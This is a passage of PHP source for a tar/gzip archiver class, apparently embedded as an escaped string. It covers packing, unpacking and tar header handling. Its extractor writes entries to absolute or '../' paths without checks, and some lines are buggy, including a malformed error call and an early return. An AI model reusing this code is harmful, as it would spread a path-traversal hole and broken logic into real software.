$this->closeTmpFile();
if (!rename($this->archive_name, $this->archive_name.\'.tmp\')){
$this->errors[] = __(\'Cannot rename\').\' \'.$this->archive_name.__(\' to \').$this->archive_name.\'.tmp\';
return false;
}
$tmpArchive = gzopen($this->archive_name.\'.tmp\', \'rb\');
if (!$tmpArchive){
$this->errors[] = $this->archive_name.\'.tmp \'.__(\'is not readable\');
rename($this->archive_name.\'.tmp\', $this->archive_name);
return false;
}
if (!$this->openWrite()){
rename($this->archive_name.\'.tmp\', $this->archive_name);
return false;
}
$buffer = gzread($tmpArchive, 512);
if (!gzeof($tmpArchive)){
do {
$binaryData = pack(\'a512\', $buffer);
$this->writeBlock($binaryData);
$buffer = gzread($tmpArchive, 512);
}
while (!gzeof($tmpArchive));
}
gzclose($tmpArchive);
unlink($this->archive_name.\'.tmp\');
} else {
$this->tmp_file = fopen($this->archive_name, \'r+b\');
if (!$this->tmp_file) return false;
}
}
if (isset($file_list) && is_array($file_list)) {
if (count($file_list)>0)
$result = $this->packFileArray($file_list);
} else $this->errors[] = __(\'No file\').__(\' to \').__(\'Archive\');
if (($result)&&(is_resource($this->tmp_file))){
$binaryData = pack(\'a512\', \'\');
$this->writeBlock($binaryData);
}
$this->closeTmpFile();
if ($newArchive && !$result){
$this->closeTmpFile();
unlink($this->archive_name);
}
return $result;
}
function restoreArchive($path){
$fileName = $this->archive_name;
if (!$this->isGzipped){
if (file_exists($fileName)){
if ($fp = fopen($fileName, \'rb\')){
$data = fread($fp, 2);
fclose($fp);
if ($data == \'\\37\\213\'){
$this->isGzipped = true;
}
}
}
elseif ((substr($fileName, -2) == \'gz\') OR (substr($fileName, -3) == \'tgz\')) $this->isGzipped = true;
}
$result = true;
if ($this->isGzipped) $this->tmp_file = gzopen($fileName, \'rb\');
else $this->tmp_file = fopen($fileName, \'rb\');
if (!$this->tmp_file){
$this->errors[] = $fileName.\' \'.__(\'is not readable\');
return false;
}
$result = $this->unpackFileArray($path);
$this->closeTmpFile();
return $result;
}
function showErrors ($message = \'\') {
$Errors = $this->errors;
if(count($Errors)>0) {
if (!empty($message)) $message = \' (\'.$message.\')\';
$message = __(\'Error occurred\').$message.\': <br/>\';
foreach ($Errors as $value)
$message .= $value.\'<br/>\';
return $message;
} else return \'\';
}
function packFileArray($file_array){
$result = true;
if (!$this->tmp_file){
$this->errors[] = __(\'Invalid file descriptor\');
return false;
}
if (!is_array($file_array) || count($file_array)<=0)
return true;
for ($i = 0; $i<count($file_array); $i++){
$filename = $file_array[$i];
if ($filename == $this->archive_name)
continue;
if (strlen($filename)<=0)
continue;
if (!file_exists($filename)){
$this->errors[] = __(\'No file\').\' \'.$filename;
continue;
}
if (!$this->tmp_file){
$this->errors[] = __(\'Invalid file descriptor\');
return false;
}
if (strlen($filename)<=0){
$this->errors[] = __(\'Filename\').\' \'.__(\'is incorrect\');;
return false;
}
$filename = str_replace(\'\\\\\', \'/\', $filename);
$keep_filename = $this->makeGoodPath($filename);
if (is_file($filename)){
if (($file = fopen($filename, \'rb\')) == 0){
$this->errors[] = __(\'Mode \').__(\'is incorrect\');
}
if(($this->file_pos == 0)){
if(!$this->writeHeader($filename, $keep_filename))
return false;
}
while (($buffer = fread($file, 512)) != \'\'){
$binaryData = pack(\'a512\', $buffer);
$this->writeBlock($binaryData);
}
fclose($file);
} else $this->writeHeader($filename, $keep_filename);
if (@is_dir($filename)){
if (!($handle = opendir($filename))){
$this->errors[] = __(\'Error\').\': \'.__(\'Directory \').$filename.__(\'is not readable\');
continue;
}
while (false !== ($dir = readdir($handle))){
if ($dir!=\'.\' && $dir!=\'..\'){
$file_array_tmp = array();
if ($filename != \'.\')
$file_array_tmp[] = $filename.\'/\'.$dir;
else
$file_array_tmp[] = $dir;
$result = $this->packFileArray($file_array_tmp);
}
}
unset($file_array_tmp);
unset($dir);
unset($handle);
}
}
return $result;
}
function unpackFileArray($path){
$path = str_replace(\'\\\\\', \'/\', $path);
if ($path == \'\' || (substr($path, 0, 1) != \'/\' && substr($path, 0, 3) != \'../\' && !strpos($path, \':\'))) $path = \'./\'.$path;
clearstatcache();
while (strlen($binaryData = $this->readBlock()) != 0){
if (!$this->readHeader($binaryData, $header)) return false;
if ($header[\'filename\'] == \'\') continue;
if ($header[\'typeflag\'] == \'L\'){ //reading long header
$filename = \'\';
$decr = floor($header[\'size\']/512);
for ($i = 0; $i < $decr; $i++){
$content = $this->readBlock();
$filename .= $content;
}
if (($laspiece = $header[\'size\'] % 512) != 0){
$content = $this->readBlock();
$filename .= substr($content, 0, $laspiece);
}
$binaryData = $this->readBlock();
if (!$this->readHeader($binaryData, $header)) return false;
else $header[\'filename\'] = $filename;
return true;
}
if (($path != \'./\') && ($path != \'/\')){
while (substr($path, -1) == \'/\') $path = substr($path, 0, strlen($path)-1);
if (substr($header[\'filename\'], 0, 1) == \'/\') $header[\'filename\'] = $path.$header[\'filename\'];
else $header[\'filename\'] = $path.\'/\'.$header[\'filename\'];
}
if (file_exists($header[\'filename\'])){
if ((@is_dir($header[\'filename\'])) && ($header[\'typeflag\'] == \'\')){
$this->errors[] =__(\'File \').$header[\'filename\'].__(\' already exists\').__(\' as folder\');
return false;
}
if ((is_file($header[\'filename\'])) && ($header[\'typeflag\'] == \'5\')){
$this->errors[] =__(\'Cannot create directory\').\'. \'.__(\'File \').$header[\'filename\'].__(\' already exists\');
return false;
}
if (!is_writeable($header[\'filename\'])){
$this->errors[] = __(\'Cannot write to file\').\'. \'.__(\'File \').$header[\'filename\'].__(\' already exists\');
return false;
}
} elseif (($this->dirCheck(($header[\'typeflag\'] == \'5\' ? $header[\'filename\'] : dirname($header[\'filename\'])))) != 1){
$this->errors[] = __(\'Cannot create directory\').\' \'.__(\' for \').$header[\'filename\'];
return false;
}
if ($header[\'typeflag\'] == \'5\'){
if (!file_exists($header[\'filename\'])) {
if (!mkdir($header[\'filename\'], 0777)) {
$this->errors[] = __(\'Cannot create directory\').\' \'.$header[\'filename\'];
return false;
}
}
} else {
if (($destination = fopen($header[\'filename\'], \'wb\')) == 0) {
$this->errors[] = __(\'Cannot write to file\').\' \'.$header[\'filename\'];
return false;
} else {
$decr = floor($header[\'size\']/512);
for ($i = 0; $i < $decr; $i++) {
$content = $this->readBlock();
fwrite($destination, $content, 512);
}
if (($header[\'size\'] % 512) != 0) {
$content = $this->readBlock();
fwrite($destination, $content, ($header[\'size\'] % 512));
}
fclose($destination);
touch($header[\'filename\'], $header[\'time\']);
}
clearstatcache();
if (filesize($header[\'filename\']) != $header[\'size\']) {
$this->errors[] = __(\'Size of file\').\' \'.$header[\'filename\'].\' \'.__(\'is incorrect\');
return false;
}
}
if (($file_dir = dirname($header[\'filename\'])) == $header[\'filename\']) $file_dir = \'\';
if ((substr($header[\'filename\'], 0, 1) == \'/\') && ($file_dir == \'\')) $file_dir = \'/\';
$this->dirs[] = $file_dir;
$this->files[] = $header[\'filename\'];
}
return true;
}
function dirCheck($dir){
$parent_dir = dirname($dir);
if ((@is_dir($dir)) or ($dir == \'\'))
return true;
if (($parent_dir != $dir) and ($parent_dir != \'\') and (!$this->dirCheck($parent_dir)))
return false;
if (!mkdir($dir, 0777)){
$this->errors[] = __(\'Cannot create directory\').\' \'.$dir;
return false;
}
return true;
}
function readHeader($binaryData, &$header){
if (strlen($binaryData)==0){
$header[\'filename\'] = \'\';
return true;
}
if (strlen($binaryData) != 512){
$header[\'filename\'] = \'\';
$this->__(\'Invalid block size\').\': \'.strlen($binaryData);
return false;
}
$checksum = 0;
for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1));
for ($i = 148; $i < 156; $i++) $checksum += ord(\' \');
for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1));
$unpack_data = unpack(\'a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor\', $binaryData);
$header[\'checksum\'] = OctDec(trim($unpack_data[\'checksum\']));
if ($header[\'checksum\'] != $checksum){
$header[\'filename\'] = \'\';
if (($checksum == 256) && ($header[\'checksum\'] == 0)) return true;
$this->errors[] = __(\'Error checksum for file \').$unpack_data[\'filename\'];
return false;
}
if (($header[\'typeflag\'] = $unpack_data[\'typeflag\']) == \'5\') $header[\'size\'] = 0;
$header[\'filename\'] = trim($unpack_data[\'filename\']);
$header[\'mode\'] = OctDec(trim($unpack_data[\'mode\']));
$header[\'user_id\'] = OctDec(trim($unpack_data[\'user_id\']));
$header[\'group_id\'] = OctDec(trim($unpack_data[\'group_id\']));
$header[\'size\'] = OctDec(trim($unpack_data[\'size\']));
$header[\'time\'] = OctDec(trim($unpack_data[\'time\']));
return true;
}
function writeHeader($filename, $keep_filename){
$packF = \'a100a8a8a8a12A12\';
$packL = \'a1a100a6a2a32a32a8a8a155a12\';
if (strlen($keep_filename)<=0) $keep_filename = $filename;
$filename_ready = $this->makeGoodPath($keep_filename);
if (strlen($filename_ready) > 99){ //write long header
$dataFirst = pack($packF, \'././LongLink\', 0, 0, 0, sprintf(\'%11s \', DecOct(strlen($filename_ready))), 0);
$dataLast = pack($packL, \'L\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\');
// Calculate the checksum
$checksum = 0;
// First part of the header
for ($i = 0; $i < 148; $i++)
$checksum += ord(substr($dataFirst, $i, 1));
// Ignore the checksum value and replace it by \' \' (space)
for ($i = 148; $i < 156; $i++)
$checksum += ord(\' \');
// Last part of the header
for ($i = 156, $j=0; $i < 512; $i++, $j++)
$checksum += ord(substr($dataLast, $j, 1));
// Write the first 148 bytes of the header in the archive
$this->writeBlock($dataFirst, 148);
// Write the calculated checksum
$checksum = sprintf(\'%6s \', DecOct($checksum));
$binaryData = pack(\'a8\', $checksum);
$this->writeBlock($binaryData, 8);
// Write the last 356 bytes of the header in the archive
$this->writeBlock($dataLast, 356);
$tmp_filename = $this->makeGoodPath($filename_ready);
$i = 0;
while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != \'\'){
$binaryData = pack(\'a512\', $buffer);
$this->writeBlock($binaryData);
}
return true;
}
$file_info = stat($filename);
if (@is_dir($filename)){
$typeflag = \'5\';
$size = sprintf(\'%11s \', DecOct(0));
} else {
$typeflag = \'\';
clearstatcache();
$size = sprintf(\'%11s \', DecOct(filesize($filename)));
}
$dataFirst = pack($packF, $filename_ready, sprintf(\'%6s \', DecOct(fileperms($filename))), sprintf(\'%6s \', DecOct($file_info[4])), sprintf(\'%6s \', DecOct($file_info[5])), $size, sprintf(\'%11s\', DecOct(filemtime($filename))));
$dataLast = pack($packL, $typeflag, \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\');
$checksum = 0;
for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1));
for ($i = 148; $i < 156; $i++) $checksum += ord(\' \');
for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1));
$this->writeBlock($dataFirst, 148);
$checksum = sprintf(\'%6s \', DecOct($checksum));
$binaryData = pack(\'a8\', $checksum);
$this->writeBlock($binaryData, 8);
$this->writeBlock($dataLast, 356);
return true;
}
function openWrite(){
if ($this->isGzipped)
$this->tmp_file = gzopen($this->archive_name, \'wb9f\');
else
$this->tmp_file = fopen($this->archive_name, \'wb\');
if (!($this->tmp_file)){
$this->errors[] = __(\'Cannot write to file\').\' \'.$this->archive_name;
return false;
}
return true;
}
function readBlock(){
if (is_resource($this->tmp_file)){
if ($this->isGzipped)
$block = gzread($this->tmp_file, 512);
else
$block = fread($this->tmp_file, 512);
} else $block = \'\';
return $block;
}
function writeBlock($data, $length = 0){
if (is_resource($this->tmp_file)){
if ($length === 0){
if ($this->isGzipped)
gzputs($this->tmp_file, $data);
else
fputs($this->tmp_file, $data);
} else {
if ($this->isGzipped)
gzputs($this->tmp_file, $data, $length);
else
fputs($this->tmp_file, $data, $length);
}
}
}
function closeTmpFile(){
if (is_resource($this->tmp_file)){
if ($this->isGzipped)
gzclose($this->tmp_file);
else
fclose($this->tmp_file);
$this->tmp_file = 0;
}
}
function makeGoodPath($path){
if (strlen($path)>0){
$path = str_replace(\'\\\\\', \'/\', $path);
$partPath = explode(\'/\', $path);
$els = count($partPath)-1;
for ($i = $els; $i>=0; $i--){
if ($partPath[$i] == \'.\'){
// Ignore this directory
} elseif ($partPath[$i] == \'..\'){
$i--;
}
elseif (($partPath[$i] == \'\') and ($i!=$els) and ($i!=0)){
} else
$result = $partPath[$i].($i!=$els ? \'/\'.$result : \'\');
}
} else $result = \'\';
return $result;
}
}
?>